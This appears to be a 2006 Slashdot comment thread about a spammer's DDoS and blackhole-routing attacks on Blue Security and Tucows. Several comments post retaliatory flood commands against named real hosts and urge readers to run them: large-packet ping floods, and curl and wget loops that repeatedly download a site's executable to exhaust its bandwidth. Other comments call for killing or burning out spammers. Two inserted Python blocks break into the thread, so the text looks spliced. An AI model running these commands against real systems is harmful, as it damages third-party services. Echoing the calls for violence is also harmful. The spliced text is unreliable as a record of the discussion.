What Happened to Blue Security
shadowknot writes "Blue Security has published a detailed account of the attack on their servers perpetrated by spammer "PharmaMaster". The attack included a DDoS attack on the Blue Security operational system and a Black Hole filtering attack on the Blue Security website. From the article: "The first attack was to block worldwide access to Blue Security's corporate website (www.bluesecurity.com) by tampering with the Internet backbone using a technique called "Blackhole Filtering". The Second attack was a DDoS attack on Blue Security's operational system."
They deserve a break.
Come on, if you have never used Bluesecurity, then you were obviously not in their database, and your email could not have been leaked to the spammers! Obviously, the spammers just sent out these FUD spam mails to everyone, just like spammers generally do.
[May 3rd 16:43 GMT]
PharmaMaster Strikes Again, Takes Down Tucows
PharmaMaster starts another attack and takes down Tucows's DNS servers which were serving thousands of sites, including Blue Security's. Tucows terminates Blue Security's account in an attempt to stop the attack.
And it wasn't all that long ago that DNS vulnerabilities were under discussion. Attacking a DNS server not only takes out the site intended, it has the bonus of collateral damage. Imagine the chagrin of all the other sites served by Tucows when they all go down en masse and imagine the PR campaign that Blue Security is going to have to wage to get any credibility back.
Have you even been following this issue? They didn't have a list leaked...
Isn't the fact that you, a non-user, got the email proof enough that nothing was leaked? Unless the spammer "hacked" your address from a list it wasn't on (which would be a neat trick) he or she was just spamming everyone available, hoping to get Bluesecurity's users along with it.
Even if the servers were temporarily downed, the publicity generated from this incident surely got quite a few new members.
Heck, I even signed up; shall have to wait and see if it's worth it though.
Someone used their tool to clean a list, then compared the clean list to a "pre-scrub" list, which means they didn't gain any email addresses, they just learned something about the emails they already had been sending spam to.
Don't quit Blue Security. My philosophy boils down to "millions for defense, not a penny for tribute" (Jefferson).
What is the name and location of PharmaMaster? I'd like to see him DDOS his way out of a crowd of angry villagers carrying torches and pitchforks.
See, that is the rub. When I heard about the company, I emailed their techs a few times to learn about the project. I decided not to use them simply because I feared this type of event, and didn't want my email box doomed to this kind of fate. Good thing they saved my email address for later use.
If a nation expects to be ignorant and free, in a state of civilization, it expects what never was and never will be.-TJ
So who is Pharma master? With all the info that's been compiled on the top spammers, isn't this guy in ROKSO yet?
Lets find him and show him some "affection".
Yeah. I emailed their techs twice to ask some questions, but decided not to use the software to avoid exactly this. Good thing they saved my email.
So, which Tier-1 ISP is having their name withheld? Any ideas?
It seems that, with more people using bluefrog, the defense will become more effective.
Looks like Tucows really behaved badly. They cancelled the account of a legitimate user instead of defeating the attack. They should never have given in to the spammer's demands.
Apparently spammers are lining up to help out Pharmamaster from the SpecialHam forums. Digg.com users yesterday attempted launching multiple types of bandwidth vampirism and DDoS attacks on SpecialHam as well. http://digg.com/technology/SPAMmers_really_pissed_off_at_bluesecurity,_read_their_message_board
>Blue's operational team reports on more symptoms supporting PharmaMaster's claims that the backbone of the Internet was compromised (blackhole filtering at the backbone level).
No offence to the Blue guys' disrupted service, but I think this is the most interesting bit. I wonder whether this description is correct and if so, how the spammer achieved THAT.
I signed up over the weekend, but never got a confirmation email. I'd like to use them, but I can't forward emails until I get a conformation.
You're an idiot. No one "gave" anybody an email list. If you signed up with Blue you agreed to have them submit "opt-out" requests on your behalf at spam sites.
Read before you type, moron.
What happened was that the spammer complied with instructions from Blue Security to download a program that washed Blue Security protected email addresses from the spammers' sucker list. When this program was run on the spammer's email list, Blue Security email addresses were purged. The spammer simply compared the purged list against his unpurged list and listed all the email addresses that were removed. He then sent the threatening emails to any email address that was purged from the original list.
Blue Security is up and running again. Not only will I continue to use the Blue Frog, I will also promote it now. I do not like bullies, and will do whatever I can to stop them. Blue Security and others that help people punch back against spammers should be commended. I myself have written a signed applet that also punishes spammers.
One can look at it by visiting http://www.plaza1.net/SpammerSlapper .
The applet is GPL, and the source code is embedded in the applet. If you do not want to actually punish spammers, do not accept the certificate. I am also thinking about creating a java application that works in a similar way to Blue Frog - only the complaint instructions will be distributed via a peer to peer protocol and cryptographically signed. Any ideas on this one?
Yup, really good thing that people like you give in so easily to the spammers. You make me sick!
Freedom is not worth having if it does not include the freedom to make mistakes. - Mahatma Gandhi
What's "blackhole filtering"?
I tried downloading their software and signing up with them over the last week.
Figured if a spammer is that pissed off at them they must be doing something right.
The sign up site was often down, but when it was up I always seemed to fail their captcha.
Did anyone have more luck?
this is a really cool story about how a company handled a DDoS attack by organized crime.
xkcd.com - a webcomic of mathematics, love, and language.
The DNS vulnerabilities are not hurting Blue Security's credibility!
That a hacker had to use a sledgehammer to cause them significant harm shows that Blue Security was/is doing something correctly.
The group that will need to gain back credibility are the organizations that are operating these vulnerable DNS servers, because it's their vulnerability that allowed such significant collateral damage.
The Blue Security gang apparently never give out email addresses, just md5'd strings of the email addresses to be excluded.
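The list-washing attack described in the comments above (the spammer runs the washing tool, diffs the before and after lists, and keeps the difference), as an added Python example; this is not Blue Security's code, and the tool's behaviour is reconstructed from the thread. The md5 digests stand in for the "md5'd strings" the comment mentions. All addresses are constructed sample data, and the normalisation step (trim and lowercase before hashing) is an assumption about how such a tool would match addresses.

```python
import hashlib


def hash_address(addr: str) -> str:
    """Digest of a normalised address. Lowercasing/trimming is an assumption
    about how a washing tool would match the spammer's copy of an address
    against the registry's copy of the same address."""
    return hashlib.md5(addr.strip().lower().encode("utf-8")).hexdigest()


def build_optout_registry(members):
    """What the washing tool ships: digests only, never the plaintext."""
    return {hash_address(a) for a in members}


def wash_list(spam_list, registry):
    """What the tool does for the spammer: drop addresses whose digest is registered."""
    return [a for a in spam_list if hash_address(a) not in registry]


def recover_members(spam_list, washed_list):
    """The attack from the thread: diff the list before and after washing.
    Whatever disappeared is, by construction, a registered address."""
    return sorted(set(spam_list) - set(washed_list))


def probe_registry(registry, candidates):
    """Same leak without running the tool at all: anyone holding the digest set
    can test every plaintext address they already have against it."""
    return sorted(a for a in candidates if hash_address(a) in registry)


# Constructed sample data (not real addresses or real Blue Security members).
MEMBERS = ["alice@example.org", "carol@example.net"]
SPAM_LIST = ["alice@example.org", "bob@example.com",
             "carol@example.net", "dave@example.org"]


def demo():
    registry = build_optout_registry(MEMBERS)
    washed = wash_list(SPAM_LIST, registry)
    leaked = recover_members(SPAM_LIST, washed)
    return washed, leaked


if __name__ == "__main__":
    washed, leaked = demo()
    print("washed list:", washed)          # bob and dave remain
    print("recovered members:", leaked)    # alice and carol: exactly the registered ones
    print("direct probe:", probe_registry(build_optout_registry(MEMBERS), SPAM_LIST))
```

The point the thread is circling: a digest hides an address only from someone who does not already hold it. Against a party holding the plaintext list, the registry is a membership oracle, and keying or salting the hash changes nothing, because the washing tool has to compute the same digests locally on the spammer's machine. A scheme that does not reveal which of the spammer's addresses are members would need a private set intersection protocol rather than a hash list.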
That service is not operational yet. They said it should be "soon".
"terrorism" and "pedophilia" are the root passwords to the Constitution
at least, that's the way it seems to be described.
He tried to kill me with a forklift!
shameless from digg, but an easy redirect for /.ers without having to read digg's stuff:
information week's take on it makes it seem less, well, amazing on the part of the spammers.
http://www.informationweek.com/story/showArticle.jhtml?articleID=187200875
When you read Blue Security's press releases, it seems obvious they are a little on the desperate side, trying to figure out how to deal with this Pharmamaster character who has brought their network to its knees. What's unfortunate about the situation is that it calls to light the sad state of backbone administration, where the major providers can't or won't do anything about the situation, and a company is left trying to appeal to the general public to do something about it.
Of course if the attack had occurred against a company like General Electric or Eli Lilly, the perpetrator would be in jail right now.
It seems obvious the perp is an American. It shouldn't be that difficult to track him down, especially since he's IM'ing the victims.
Wow, if this is a detailed timeline, I'd hate to see the summary.
"Some shit happened."
As a security guy, this could have been really interesting, but it's not.
[May 3rd 23:23 GMT]
PharmaMaster Boasts Success
Tucows is a company I will never recommend or use to host any of my domains.
Caving in to a spammer/hacker retaliation will not garner much support.
http://www.joker.com/ serves my needs well
Rick B.
Enquiring minds (and all that) want to know.
This was truly lame and inexcusable - redirecting the attack from themselves to someone else.
Notice that the bluesecurity.com website was *NOT* being flooded with packets. On the contrary, it was routed to null for all the internet except Israel. In summary, there were 4 different DOS attacks:
* Packet flooding (lots of traffic) the operational servers (the ones doing the opt-outs)
* Null routing blue's www (no traffic)
* Packet flooding the redirected www at Six Apart (lots of traffic)
* Packet flooding Tucows' DNS servers (lots of traffic)
So, technically, blue security didn't redirect the attack.
They were pretty successful at it, they got it really slow before the rehosting at a University. They also made the forum cancel registrations and blanked a few gateway pages, which had to be a bit of a nuisance to the spammers. See it here.
This ferocious attack on Blue Security as well as Typepad and TUCOWS is proof that Blue Security's tactics are working. Spammers are scared to death of Blue Frog because it forces them to comply with the spirit of CANSPAM (since it is worthless in practise). They are so desperate that they are damaging the internet backbone to slightly increase the limited time that spam will be profitable.
Do not listen to FUD-spreading ignoramuses who will no doubt leave many /. comments urging you to stay away from Blue Frog. Spammers do not have Blue Security's member lists - they are simply DIFFing their entire lists with the opt-outs sent by Blue Frog and sharing their filters with the "mailer community". Yes, some members (not me) have been threatened with, and temporarily received, more spam. However, this can't last since spammers who do this are simply fighting fire with gasoline! The more spam Blue Frog users get, the more opt-outs the spammer and client receive which costs them time and money! Plus, regarding threats to leave Blue Frog, does it make sense that a spammer would remove ANY working email address for ANY reason?
Who do you trust to solve your spam problem? Microsoft? Your government? If they really cared, wouldn't the problem have been solved long before spam encompassed 90% of all email? Blue Security offers a realistic, fair, assertive, and EFFECTIVE means of hitting spammers where it hurts - in the database and in the pocketbook. They need your help to make spam an unprofitable, inconvenient vehicle for advertisers.
I urge each and every /.er to sign up for a Blue Frog account RIGHT NOW (or whenever they're not getting DOSed) and simply forward your spam to yourusername@reports.bluesecurity.com. You can wait a day or two and send many spams as attachments in one email, or you can let the resident client do it for you. It's so easy and the headlines prove that it really does make a difference.
Spammers are childishly thrashing around the internet like a bull in a china shop, having a flailing temper tantrum because people dare to stand up for their privacy. It is the duty of /.ers, as an informed userbase, to stand up for those internet users who don't know how to stand up for themselves.
We have the numbers and the motivation. Aren't you sick and tired of these rich criminals wasting our time, defrauding our elders, and endangering our children day after day? If we stand together, just as the spammers stand together to attack Blue Security, then we WILL win.
Sign up for a Blue Frog account ASAP and encourage your friends and family to do the same, as I have. And if you think it's possible to reason with spammers, check out this CastleCops forum thread that shows inside conversations from a spammer message board.
Those spammers will send threatening e-mails whether you unsubscribe or not, so don't unsubscribe. They're doing this because it's hurting them in the pocket. Big deal. I don't give a damn if a spammer can't buy a new humvee limo, and I don't have to support those scumbags. So if they want to fill my mailbox with their trash, so be it. I will not bend over to them. I will not unsubscribe. I will not let those fscking bastards tell me what I should do.
...they must be doing something right! I'm signing up.
Thanks PharmaMaster for referring me!
Not that I think that they would bother with a spammer but a guy can dream can't he?
MMO Quests are like orgasms:
You may solo them, I prefer them in a group.
I've signed up with them about four months ago and saw the spam on my "protected" accounts go down by about 50%. It doesn't kill all the spam, but every bit helps.
/dev/null is a special device and it is nothing. If you write to it it goes nowhere just disappears.
Common joke is that you backed up to /dev/null because it had plenty of space.
I don't think windows has a similar function readily available.
So what do you use it for? Well when you have something that needs to output to something and you don't want it. Commonly used in scripts that run automatically to throw away unneeded messages.
As for how and why routers should have this. No idea. Sounds odd that you could get a router to discard its data.
One of the world?s largest spammer?s, ?PharmaMaster?
This was from IE 6.0.2800. As I'm at work I haven't looked in Firefox to see if it's equally retarded..
If they can't write HTML that will display properly in all browsers, particularly with the one 80% of surfers use, can they really be "good with computers?"
And if the question mark in "spammer?s" is supposed to be an apostrophe, they're not only incompetent but illiterate.
Perhaps the spammer took them on because they were an easy mark? These folks should hire a web designer that knows HTML and what it's for (hint: conveying information), and if that one question mark is supposed to be an apostrophe, a copyrighter who isn't a retarded illiterate.
However, the fact that they were complicit in the spammer's taking blogs down also shows their lack of competence.
That said, who is this "PharmaMaster?" I'd like a real name and meatspace home address so I can forward all of my snail junk mail to him and encourage arsonists to burn his house down, preferably with him in it. It's time for a little bloody vigilantism, folks. Let's kill some spammers. Blue Security, who is this guy and why are you helping him stay anonymous?
Is to kill the spammers. Obviously the death penalty doesn't resolve the issue forever, or we'd not have as much crime as we do in the world, but it will deter most spammers.
We put down rabid dogs because they have the potential to harm human beings despite having no intention to do so. Why is it less humane to remove life that actively and maliciously harms others?
Hi,
I haven't really paid attention to the "attack actual spam messages" front.
How is this any different from forwarding my email to myspamaddress@spamcop.net?
...and show him my SIG. [DUKE NUKEM MODE]Come get some[/DUKE NUKEM MODE]
-"...bad old ideas look confusingly fresh when they are packaged as technology" - Jaron Lanier (Digital Maoism on Edge.o
An InfoWorld article from May 4th quoted Blue Security CEO Eran Reshef as saying:
Since Blue Security is now referring to "tier-1 ISP name withheld", that means one of several things:
I had almost dismissed bluefrog as yet another spam control tool. Now I know it is really hurting them. Signed on as soon as their servers allowed me. I can't wait until they get fully online again to finish generation of my account.
Thanks Pharma!
My other OS is the MCP!
If you must!
Here's that command for you:
(linux) ping -i 0.2 -w 0.2 -s 65000 www.specialham.com
Because I know some people who would happily beat him to within an inch of his life, THEN put him in public stocks for a few years.
The guy may as well just put up a giant banner proclaiming that he's a world class jackass.
Most owners of spamvertised sites do NOT want traffic, they want money. They only want the .01% of spam victims who are stupid enough to buy their crap to visit their site to complete the sale. However, in order to get the orders for their profit, they have to have a place where users can come to. This place is their website. Website owners have to PAY for bandwidth consumption. Traffic consumes bandwidth. Therefore traffic is an expense. What the website owners really want is orders that bring in money.
When a site receives traffic from those who do not buy, it is the same as a store which has 200 people just looking around (and not buying). These browsers cause wear and tear on the carpet, require the watchful eye of security, require resources to answer questions, and make it more crowded so that it is more difficult for paying customers to find what they are looking for and complete the transaction.
Right now, the ratio of revenue-generating traffic (those who come to a website to buy) versus the non revenue-generating traffic is high enough to justify having the website running and paying the spammers. When there is 8 gigs of traffic (non revenue generating) from spam haters for every byte of revenue producing traffic, then advertising a website via spam will be very UNPROFITABLE. When those who advertise by spam see loss instead of profits, they will quit paying spammers (or stop spamming themselves). This is why spammers hate the likes of Blue Security, SpammerSlapper, SpamFryer, and other retaliatory tools.
What the spammers do not realize is that people who are ready to resort to using such antispammer tactics DO NOT like spamvertised websites nor will they buy crap from these websites. Blue Security is actually doing spammers a favor by pointing out the email recipients who do not want the spam and are willing to cause problems. If I were a spammer, I would want to listwash my sucker list and get rid of the email addresses of troublemakers and concentrate on the idiots who buy stuff advertised via spam. That way I would have to send out a lot less spam to get the sales I want. Spammers should go only after the suckers and leave the rest of us alone. When these nooby suckers decide that they are tired of being robbed and spammed into oblivion, they can then add their name and voice to the rest of the angry masses who have HAD ENOUGH.
From: http://72.14.207.104/search?q=cache:daxdV_-e7aQJ:www.cisco.com/warp/public/732/Tech/security/docs/blackhole.pdf+Blackhole+Filtering&hl=en&ct=clnk&cd=1
Benefits of Remotely Triggered Black Hole Filtering
Black holes, from a network security perspective, are placed in the network where traffic is forwarded and dropped. Once an attack has been detected, black holing can be used to drop all attack traffic at the edge of an Internet service provider (ISP) network, based on either destination or source IP addresses. RTBH filtering is a technique that uses routing protocol updates to manipulate route tables at the network edge or anywhere else in the network to specifically drop undesirable traffic before it enters the service provider network.
RTBH filtering provides a method for quickly dropping undesirable traffic at the edge of the network, based on either source addresses or destination addresses, by forwarding it to a null0 interface. Null0 is a pseudointerface that is always up and can never forward or receive traffic. Forwarding packets to null0 is a common way to filter packets to a specific destination.
To help out with Digg's effort, visit this page: http://konspence.com/specialham/artistcopy.htm. Just leave it running all day, you'll use a few hundred MB of bandwidth on your own.
I'm including a link to BlueFrog in my signature of my emails.
It may be true that the death penalty may not reduce crime rates. But, the death penalty reduces recidivism rates.
Fight Spammers!
For those new to this whole "BlueFrog" story, unsure who is the "good guy":
Pro:
Con:
(Windows) ping www.specialham.com -l 65000 -t -w 0
Web 2.0 == Giant Blogspam Circle Jerk
I didn't get one of these threatening emails, which is a pity as I have been a member of bluesecurity for a fair old while (well, since mailwasher added it to their anti-spam services).
:( but I'm sure it won't last.
I feel a bit left out now
I know you can use MailWasher Pro www.firetrust.com to report spam to Blue Security. Quite a bit easier than forwarding all your spam to them directly.
Oh yea...you can read about it here...
http://www.codemonkeyx.org/?p=19
Bottom line the advertisers know how their money is being spent. There's no excuse which allows them to claim ignorance. Once they are sued they'll look into it if they don't already know. The advertisers are funding this type of illegal behavior and so they should be held accountable. Large lawsuits or even criminal prosecution. These spammers and those illegally compromising the backbones are acting as agents of the advertisers, period.
You can lead a man with reason but you can't make him think.
That thread is great ... I wonder about the Oslo university thing (that's where they've now moved their server to). If anyone here speaks Norwegian and wanted to write them a letter, contact info is on the Digg page. I'm surprised it hasn't gotten taken down already, but maybe the sysop there doesn't read English (I assume all the Digg'ers have been writing in English...).
They also read through the forums and found some of the actual spammers' websites:
http://www.northworks.biz/ This one is one of the shadiest, they're selling email harvesters.
In case anyone wants to take matters into their own hands, as one of the Digg people pointed out, there's always:
while :; do curl -o /dev/null http://www.northworks.biz/install_mc_shareware.exe ; done
His bandwidth bill is going to suck this month...
"Ladies and gentlemen, my killbot features Lotus Notes and a machine gun. It is the finest available."
Not to mention, the actions of pharmamaster are borderline terrorism. (just in case the NSA is watching ;) Not even freedom fighter terrorism, just good old fashioned fearmongering terrorism.
Just call UUNET Spam Support Services and ask.
Bluesecurity's email list wasn't compromised. If you signed up for bluesecurity you did so because the spammers already have your email address. Many people who never heard of Blue Security also received these emails which is just further proof that PharmaMaster simply used his existing mailing list to send these out.
That's all, UNICODE vs ASCII, I don't remember why it does that. I think IE doesn't support the standard is the problem.
These attacks do NOT mean Blue Security is doing something correctly.
The attacks DO show that Blue Security has been successful at pissing off their target.
I still haven't received mine either. However, I did install the client, and it seems to have created me an account. The password must be in the e-mail, but until then the client will log me in to the website. Also, it seems to keep track of the spam that I have forwarded it through both manual forwarding and the Firefox extension.
Bluesecurity (BS) are either confused or misleading people.
There is no way that a single "backbone" provider could have installed a null route to block all traffic to their network. Bluesecurity is served by a Haifa-based provider called Netvision (Autonomous System number 1680). Netvision buys internet transit from four providers:
--UUnet/701 (uunet north america)
--UUnet/702 (uunet europe/middle east)
--btn/3491 (beyond the network)
--telia/1299 (telia sonera international backbone).
What the heck is BS claiming? That *all* of them installed a null route at once? Do they even know what a null route is?
I'm getting annoyed enough at this nonsense to think about blogging about it in more detail over at www.renesys.com/blogs. Perhaps later today.
Foolishness.
Does anyone know when Blue Security will be fully functional again? There are still some services that don't work, as I'm writing this. Namely:
Coming Soon:
Validation emails
Online Statistics
Developers site
Outgoing email from
Blue Security
Partially working:
SMTP Spam reports
Those are not vigilantes. They are freedom fighters. Words matter. Let's use the right ones.
To me, the whole thing smacks of PR fraud on Blue Security's part. Not buying it at all. It has the smell of fried potted meat.
If you want news from today, you have to come back tomorrow.
LOOK at the HTML (it's down in the timeline) there are no entities. Here, I'll paste: (from FF at that (Opera is the same)):
PharmaMaster Works to Block Traffic to Blue?s Corporate Web Site
One of the world?s largest spammer?s, ?PharmaMaster?,
It might be an encoding problem on their end, but regardless, it is in fact, on their end.
Clones are people two.
<sigh.> I presume you meant to say copywriter. Nice try though.
<sigh> again. Read elsewhere in this thread -- they were blackholed to start, so shifting their record to another IP presented no immediate threat to wherever they were moving to. The DDoS only started after they shifted IPs.
"What in the name of Fats Waller is that?"
"A four-foot prune."
Great... so by subscribing at blue security I can force the spammers to multiply their bandwidth by 20-40 ? Sounds like a DDoS for me. :)
I think you forget that DOD and for that matter most of the Military have their own backbone where they carry any data that is of importance to them; the only data they would carry over the "regular" internet would be website info and maybe emails.
for windows users via a proxy:
@echo off
set http_proxy=http://yourproxyhereifapplicable
rem remove the above if you don't have a proxy server
:start
wget http://www.northworks.biz/install_mc_shareware.exe --proxy-user=username --proxy-pass=password
goto start
without a proxy:
@echo off
:start
wget http://www.northworks.biz/install_mc_shareware.exe
goto start
(save as a batch file in the same dir as wget)
download wget from www.gnu.org/software/wget/
have fun :-)
whoops, that'll eat your harddrive, sorry. add "-O ./foo" to the end of the wget (minus quotes)
A variation of this technique is to route packets to an internal "blackhole router" instead of to Null0. This consumes a little more resources than the Null0 option but still far less than an ACL. The blackhole router does nothing else other than null routing the traffic. It can also be used to route the traffic to a sniffing device to give the admin an opportunity to see what the malicious traffic really was. The blackhole router can also advertise internally the blackhole routes. This is useful when your network policy prohibits making changes to critical hardware such as a border router without sufficient peer review. Often when you must null route something you must do it in a hurry (i.e., a customer is being attacked). Being able to make the changes on a non-critical box (the blackhole router) and having the route changes propagate up to a critical piece of hardware (the border router(s)) is very useful.
Another reason to use them is to prevent routing loops. Let's say for example you have an access server terminating dialin customers. You've loaded out your AS with 192 modems. A /24 has been allocated for this AS. Your AS advertises that /24 with OSPF back into the core of your ISP network. However the AS's routing table doesn't contain a route for all 253 of the useable IPs in that /24. Instead individual routes are added as individual users dial in. Let's say a packet comes in that's destined for an IP that isn't in use. The AS looks at its routing table and says to itself that it doesn't have a route to that IP. It falls back on its default route which is the router upstream of the AS that just routed the packet to the AS. Rinse and repeat. A routing loop ensues.
Sometimes in BGP you have to have a static route to a given netblock to turn around and advertise it. You already have internal routes that would ultimately route the packet to the right destination. However to get BGP working you have to create a specific route. You can simply create a static route to that subnet via Null0 with a cost of 254 and make BGP happy.
There are dozens of examples of why you need null routing. Does that help? You can search on Cisco's website for additional references.
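The two mechanisms described in this thread, the Cisco RTBH excerpt quoted earlier (a trigger route that steers the victim's traffic to Null0) and the access-server routing loop in the comment above (an aggregate route anchored to Null0), as an added Python example that is not from Cisco or from any commenter. It is a toy forwarding table with longest-prefix match and recursive next-hop resolution. Prefixes are documentation ranges; the discard next-hop 192.0.2.1 is an assumed convention for the example, and interface names, administrative distance and the iBGP trigger itself are not modelled.

```python
import ipaddress

NULL0 = "Null0"


class Router:
    """Toy FIB: longest-prefix match plus recursive next-hop resolution."""

    def __init__(self):
        # ip_network -> next hop: an interface name, "Null0", or an IP address
        self.routes = {}

    def add(self, prefix, next_hop):
        self.routes[ipaddress.ip_network(prefix)] = next_hop

    def remove(self, prefix):
        self.routes.pop(ipaddress.ip_network(prefix), None)

    def lookup(self, dst):
        ip = ipaddress.ip_address(dst)
        matches = [net for net in self.routes if ip in net]
        if not matches:
            return None
        return self.routes[max(matches, key=lambda n: n.prefixlen)]

    def forward(self, dst, _depth=0):
        """Return the egress interface for dst ("Null0" means the packet is dropped)."""
        nh = self.lookup(dst)
        if nh is None:
            return "no route"
        try:
            ipaddress.ip_address(nh)
        except ValueError:
            return nh  # an interface name or Null0: resolution is finished
        if _depth > 8:
            return "unresolved"
        return self.forward(nh, _depth + 1)  # next hop is an address: resolve again


def edge_router():
    """An ISP edge router as the RTBH paper assumes it: a discard next-hop is
    pre-provisioned to Null0 so that a later /32 only has to point at it."""
    r = Router()
    r.add("0.0.0.0/0", "Serial0")          # default route toward transit
    r.add("198.51.100.0/24", "10.0.0.2")   # customer prefix, via a core next hop
    r.add("10.0.0.2/32", "Ethernet0")      # the core next hop itself
    r.add("192.0.2.1/32", NULL0)           # discard next-hop (assumed convention)
    return r


def trigger_blackhole(router, victim):
    """The effect of the trigger's routing update on one edge router:
    a host route for the victim whose next hop resolves to Null0."""
    router.add(f"{victim}/32", "192.0.2.1")


def withdraw_blackhole(router, victim):
    router.remove(f"{victim}/32")


def access_server(aggregate_to_null0):
    """The dial-in box from the comment: /32s appear as users connect, and the
    default route points back at the upstream router that delivered the packet."""
    r = Router()
    r.add("0.0.0.0/0", "Uplink")
    r.add("203.0.113.5/32", "Async5")      # one dialled-in user out of the /24 pool
    if aggregate_to_null0:
        r.add("203.0.113.0/24", NULL0)     # the advertised aggregate, anchored to Null0
    return r


def demo():
    r = edge_router()
    before = r.forward("198.51.100.10")
    trigger_blackhole(r, "198.51.100.10")
    during = (r.forward("198.51.100.10"), r.forward("198.51.100.11"))
    withdraw_blackhole(r, "198.51.100.10")
    after = r.forward("198.51.100.10")
    loop = access_server(False).forward("203.0.113.9")   # bounces back upstream
    fixed = access_server(True).forward("203.0.113.9")   # dropped locally instead
    user = access_server(True).forward("203.0.113.5")    # /32 still beats the /24
    return before, during, after, loop, fixed, user


if __name__ == "__main__":
    for label, value in zip(
            ["before", "during (victim, neighbour)", "after", "loop", "fixed", "user"], demo()):
        print(f"{label}: {value}")
```

Two things the toy makes visible. First, a destination-based black hole is a single /32 with a next hop that resolves to Null0; neighbouring hosts in the same /24 keep forwarding, and withdrawing the /32 restores the victim with no other state to clean up, which is why the trigger is routed rather than configured as an ACL. Second, the same Null0 anchor is ordinary good hygiene for any aggregate you advertise: without it, traffic for an unused address inside the prefix follows the default route back to where it came from.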
I wonder if Todd Underwood at Typepad will have the balls to apologize for the bull he was spreading about Blue Security deflecting a DDOS attack onto their servers as well as not believing that Blue Security had been blackhole filtered.
How about it Todd? Ready to blame the criminal and stop blaming the victim or what?
*sigh*
way to screw up the batch file...
the ":start" bit should be on a line by itself.
I'd probably do that too if I were an astroturfer for a sleazy spammer; instead I'm going to download the linux version of the bluefrog client and connect it to my spam account and let it run. In fact I'm probably going to engage in activities designed to get those accounts on as many spam lists as is humanly possible. I've got accounts at yahoo and gmail that get about 10 spams for every legit email, maybe I can get the clutter down to the point where they'll actually be usable again.
Apocalypse Cancelled, Sorry, No Ticket Refunds
I'm mailing this via the postal service today:
May 8th, 2006
Tucows, Inc.
96 Mowat Avenue
Toronto, ON
Canada M6K 3M1
To whom it may concern,
I just wanted to express my extreme disappointment regarding your recent actions to disable Blue Security's account in an attempt to stop the attacks of a notorious spammer. I fully understand that the attacks were a technical nightmare for your team; however, it is unbelievable that you would rather give in to a criminal and follow their demands and step on an organization that aims to protect innocent citizens from around the globe. Regardless of what your motive was, this action clearly states that you are more interested in profit than you are in ethics. As a result, I am recommending that all contacts I have that use Tucows' services remove their accounts and utilize a service which supports consumer protection. It is my sincere hope that should a similar situation arise, you will think of the company that is trying to protect the Internet.
I attempted to forward some spam i've been getting, but was denied because my account isn't verified yet.
I got over 1600 total new spam messages in 2 of my accounts protected by blue security. All but 4 were sent to my spam folder. Spam has increased, but gmail's spam filters worked like a charm!
I saw that somewhere... oh yeah Steve Ballmer, Linux seller of the year! :)
No sig for now.
The reference is from the old days when microwave radio links were pervasive (although there are still quite a few in service). "Fading" is when atmospheric conditions cause the received radio wave to drop in intensity, as in fade away. Heavy rain, fog, temperature inversions - all common causes.
However, in the case of backhoe fade, the signal drops off instantaneously :-)
"A little misunderstanding? Galileo and the Pope had a little misunderstanding."
Running strings on that, it seems to be packaged with http://www.tarma.com/ packager. Has anyone sandboxed the app itself and pulled that scumware apart?
They are truly scared.
This is a very potent weapon against spam.
It turns the tables on them: for every message they send, they get a reply. This breaks the economy for spam. They know it and are lashing out with everything they can think of. Problem is, some of their tricks are very illegal and are going to land a few of them in the can.
They use zombies to send the spam for free, but somewhere, someone has to receive the emails of suckers falling for the scams. If that box fills up with remove-me mail, the client is not going to make any money. In reality it is going to cost them bandwidth charges. If spammers send a million emails and a substantial number of those reply, the whole thing breaks.
Hopefully there will be several new anti-spam efforts using Blue Frog's model. This really has the potential to finally make spam unprofitable.
I've signed up, and will be making my email public from now on.
Starman97@gmail.com
Starman97@Gmail.com (bring it on spammers)
I think the BS guys should release some kind of distributed software, which could be used to distribute their traffic all over the world. I would be glad to give away some of my bandwidth, and probably many of you would do it too. I know it didn't work with Lycos screensaver, but maybe it could work this time...
LOL!
Sure we don't let our software be used by spammers!
Apocalypse Cancelled, Sorry, No Ticket Refunds
TTL on www.specialham.com is currently 600 and they're changing IP constantly. What was their IP before these cowardly retards started running away?
Let's call their bluff. Do this experiment yourself. And use Blue Frog.
Say Blue, if you ever have free time again, a Mac version would be grand.
FSM, grant me the serenity to preview that which I cannot change...
The fact that Tucows would kick one of their customers to the curb in a pathetic attempt to pacify a blackmailer/spammer/terrorist is shameful, short-sighted, and tragic.
While the spammer is clearly worthy of our scorn, I believe Tucows is even more deserving of public shame and disgrace. I expect a spammer to spam, I expect a hacker to hack, but I do not expect a (formerly) respectable business that takes my money to sell me out to criminals! Yes, I know they claim it was to protect their other customers, but tossing your baby to the lion to keep it from attacking everyone else is reprehensible and I thought civilization had progressed beyond this.
I for one, will NEVER use any of their services or web properties again unless they issue a public apology for their actions. Not just to BlueSecurity, but to all of their customers, because this clearly sends a signal to all would-be DDoS attackers that Tucows customers are for sale for the price of a few million IP packets!
I could totally believe it's UUNet. Pretty much the most evil, pro-spam ISP on the internet. And they have been known to use the legal system to attack anti-spammers in the past.
- Its motivation was profit
- Its methods were criminal
- Intimidation - the letters to users threatening a deluge of spam if they did not withdraw from Blue
- Vandalism - corrupting the DNS/routers to blackhole the address is technically vandalism
- Bribery? - I can't think why else a backbone provider would blackhole a legitimate company (unless it was a hack, in which case we have computer intrusion instead)
- Its technique was criminal
- DDoS attack on Tucows & blog host.
- Transmission of a threat over telecom lines - whatever you say, those trans-oceanic lines are telco lines.
If I understand the law correctly, if even 1 US customer of Blue was sent that email, then the FBI can build a case. Right now I see unauthorized use of computer services (DDoS zombies) and blackmail (the threatening letters). I can even see DHS trying out a few of those nice new terrorism laws. And yes, the US can & has requested extradition of people under blackmail & extortion charges; whether the 'Russian speaking' country will grant the extradition is another matter. Note that if the request is made, the moment he steps into a country with extradition he can be extradited to the US, and he may or may not be allowed to talk to his embassy before it happens.
Personally I liked the solution of $50K to the Russian mafia to rough him up, but I'm the vindictive type who likes poetic justice.
proof, n. A demonstration that a conclusion is implied by certain premises and axioms.
Posted A/C (despite deserving karma for hauling this crap past the lameness filter), because I cannot verify that this is the content from the specialham.com forums; the original forum posting thread (indicated via digg) has been removed and disavowed by the forum maintainer. However, Googling for a couple phrases that were quoted on Digg turned this up:
I'm not so sure that SPAM will be unprofitable.
I'm not so sure that SPAM is profitable today.
Now, selling methods to SPAM people... that's certainly profitable. Even if SPAM doesn't work.
http://www.specialham.com/specialham/searchpro.asp ?phrase=list&appid=ALL&topicreply=combined&message =both&author=&timeframe=%3E&timefilter=-1265&langu age=single&top=3000&criteria=OR&submitbutton=+OK+
